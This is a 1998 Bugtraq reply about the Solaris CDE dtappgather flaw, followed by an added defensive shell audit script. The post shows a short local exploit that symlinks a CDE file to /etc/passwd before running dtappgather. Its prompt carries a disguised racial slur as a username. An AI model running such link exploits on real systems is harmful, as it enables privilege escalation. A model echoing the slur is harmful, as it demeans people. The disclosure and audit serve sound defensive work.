Bugtraq mailing list archives
Re: /usr/dt/bin/dtappgather exploit
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Wed, 25 Feb 1998 20:26:02 +0100
patches 104497 CDE 1.0.1: dtappgather patch
I'm afraid that's not enough: it fixes the DTUSERSESSION bug, but it doesn't fix directory permissions. In a Solaris 2.5 sparc box, with patch 104497-02 you have:

    drwxrwxrwx   4 root     root        1536 Feb 25 19:46 /var/dt
    drwxrwxrwx   3 bin      bin          512 Jan 20  1997 /var/dt/appconfig
    drwxr-xr-x   4 elias    robot        512 Oct  6 14:42 /var/dt/tmp
                   ^^^^^
                   this is a normal non-admin account; sometimes the CDE login sessions change it.

so, it's still vulnerable to the link exploit (but yes, this is not a problem in 2.6, I don't know about 2.5.1)
    nigg0r@host% ls -l /etc/passwd
    -r--r--r--   1 root     other       1585 Dec 17 22:26 /etc/passwd
    nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
    nigg0r@host% dtappgather
--
J.A. Gutierrez
So be easy and free when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
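An administrator can check a tree for the conditions the message above describes (world-writable directories, directories owned by an ordinary account, links already present) with a short audit. This is an added example, not part of the original post: the function names `audit_tree` and `make_sample_tree` are hypothetical, and the sample tree is constructed under a temporary directory with the modes from the listing.

```shell
#!/bin/sh
# Added example (not from the original post). audit_tree ROOT [OWNER_UID]
# Reports conditions that leave a tree used by a privileged program open
# to link attacks. OWNER_UID defaults to 0 (root).
# Finding lines:
#   WORLD-WRITABLE <dir>        other-write set, sticky bit clear
#   OWNER <dir>                 directory not owned by OWNER_UID
#   SYMLINK <path> -> <target>  symbolic link present in the tree
# Exit status: 0 if clean, 1 if any finding was printed.
audit_tree() {
    root=$1
    owner=${2:-0}
    out=$(
        # 0002 = write for others, 1000 = sticky bit.
        find "$root" -type d -perm -0002 ! -perm -1000 -print |
            sed 's/^/WORLD-WRITABLE /'
        find "$root" -type d ! -user "$owner" -print | sed 's/^/OWNER /'
        find "$root" -type l -print | while IFS= read -r link; do
            printf 'SYMLINK %s -> %s\n' "$link" "$(readlink "$link")"
        done
    )
    [ -z "$out" ] && return 0
    printf '%s\n' "$out"
    return 1
}

# Constructed sample tree with the modes shown in the listing above,
# built under a temporary directory so nothing on the host is touched.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/var/dt/appconfig/appmanager" "$t/var/dt/tmp"
    chmod 777 "$t/var/dt" "$t/var/dt/appconfig"
    chmod 755 "$t/var/dt/appconfig/appmanager" "$t/var/dt/tmp"
    : > "$t/target"
    ln -s "$t/target" "$t/var/dt/appconfig/appmanager/generic-display-0"
    printf '%s\n' "$t"
}
```

On a real host the call would be `audit_tree /var/dt`, which also flags any directory not owned by root, such as the `/var/dt/tmp` entry in the listing.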